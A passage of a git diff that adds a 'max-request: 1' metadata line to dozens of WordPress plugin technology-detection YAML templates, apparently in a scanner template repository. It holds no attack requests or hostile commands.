+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index dc3d446af3..41baa25eb7 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 96b4699d2d..ee389af6ec 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
